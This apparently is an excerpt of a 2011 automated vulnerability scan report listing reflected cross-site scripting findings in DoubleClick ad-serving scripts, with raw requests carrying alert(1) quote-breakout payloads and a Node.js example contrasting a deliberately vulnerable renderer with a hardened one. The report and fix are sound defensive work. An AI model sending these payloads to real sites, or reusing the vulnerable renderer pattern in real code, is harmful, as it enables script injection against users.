Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7b"-alert(1)-"f629491b606 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b71b2'-alert(1)-'c477c344b94 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c9f"-alert(1)-"2dc82fe9c33 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8cd'-alert(1)-'b5744e625cb was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc7"-alert(1)-"0a30ccb0824 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3026'-alert(1)-'e11fbbb3a32 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82cb"-alert(1)-"4da37f8e4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the payload sits immediately after sa=l in the click= URL carried in the request path; the scanner reports this position as the sz parameter because of how it splits the semicolon-delimited path segment, not because a separate sz query parameter exists. Whichever name is used, the data reaches the script unescaped.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:03:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
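The findings above all share one pattern: a request parameter is concatenated into a JavaScript string literal inside the ad-serving script, once in a single-quoted string inside document.write('...') (the sig finding) and once in a double-quoted string passed to escape("...") (the sz finding). The following Node.js example is added here and is not DoubleClick's or Burp Suite's code. It reproduces both contexts in a deliberately vulnerable renderer, shows a hardened renderer that emits every value as a properly escaped JS string literal and HTML-attribute-encodes the URL, and runs each generated script with stub document/alert/escape objects to check whether the injected alert actually executes. The parameter names, click URL and probe payloads come from the report; the renderer functions, the stubs and the shortened sample values are assumptions for the example.

```javascript
// Added example; not DoubleClick's or Burp Suite's code. The parameter names and
// click URL come from the report; everything else is constructed for illustration.

// Deliberately vulnerable renderer, mirroring the pattern in the findings above:
// request parameters are concatenated raw into the click URL, which is then
// embedded (a) in a double-quoted JS string passed to escape() and (b) in a
// single-quoted JS string inside document.write().
function renderVulnerable(params) {
  const qs = Object.entries(params).map(([k, v]) => k + '=' + v).join('&');
  const click = 'http://googleads.g.doubleclick.net/aclk?' + qs;
  return [
    'var url = escape("' + click + '");',
    "document.write('<a href=\"" + click + "\">ad</a>');",
  ].join('\n');
}

// Emit a JS string literal that the input cannot terminate early: JSON.stringify
// escapes quotes, backslashes and control characters; '<' is escaped so that
// "</script>" can never appear in the output; U+2028/U+2029 are escaped for
// engines that treat them as line terminators inside string literals.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// HTML attribute encoding for the href, because the markup is later written into the DOM.
function htmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: values are percent-encoded into the query string (so the
// URL itself is well formed) and every string that lands in script goes through
// jsStringLiteral(), so the value is still reflected but is inert.
function renderHardened(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
  const click = 'http://googleads.g.doubleclick.net/aclk?' + qs;
  return [
    'var url = escape(' + jsStringLiteral(click) + ');',
    'document.write(' + jsStringLiteral('<a href="' + htmlAttr(click) + '">ad</a>') + ');',
  ].join('\n');
}

// Execute a generated ad script with stub document/alert/escape (no browser
// needed) and report whether alert() ran, what was written, and any error.
function runAdScript(script) {
  const result = { fired: false, written: '', error: null };
  try {
    new Function('document', 'alert', 'escape', script)(
      { write: (s) => { result.written += String(s); } },
      () => { result.fired = true; },
      (s) => String(s) // stub for the legacy global escape()
    );
  } catch (e) {
    result.error = e.message;
  }
  return result;
}

// Append a probe payload to one parameter (as the scanner did) and render the
// script both ways. Sample values are constructed; the real ai/sig are longer.
function probe(param, payload) {
  const params = {
    sa: 'l',
    ai: 'B4dkh_tBK',
    num: '1',
    sig: 'AGiWqtx7G7',
    client: 'ca-pub-4103679352234073',
    adurl: 'https://www.ally.com/bank/interest-checking-account/index.html',
  };
  params[param] = params[param] + payload;
  return {
    vulnerable: runAdScript(renderVulnerable(params)),
    hardened: runAdScript(renderHardened(params)),
  };
}

// The two probe shapes from the report: single-quote breakout into the
// document.write('...') context and double-quote breakout into escape("...").
const singleQuoteProbe = probe('sig', "23ee8'-alert(1)-'ebf157e0bd6");
const doubleQuoteProbe = probe('sa', 'c82cb"-alert(1)-"4da37f8e4f3');
console.log('vulnerable renderer fired alert:', singleQuoteProbe.vulnerable.fired, doubleQuoteProbe.vulnerable.fired);
console.log('hardened renderer fired alert:  ', singleQuoteProbe.hardened.fired, doubleQuoteProbe.hardened.fired);
```

The harness is what makes the probe result trustworthy: the scanner only observes that the payload is reflected, whereas runAdScript parses and executes the generated script, so a reflection that happened to be syntactically neutralised would show fired === false or a non-null error. The hardened renderer keeps the value visible in the output (so legitimate click-tracking data is preserved) and relies on context-correct encoding, not on blacklisting quotation marks.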
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a96'-alert(1)-'d3284128866 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As with the previous sz finding, the payload is actually placed immediately after sa=l in the click= URL within the request path; the sz label comes from the scanner's handling of the semicolon-delimited path segment.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nk\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d0bc'-alert(1)-'4aa45ed95d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
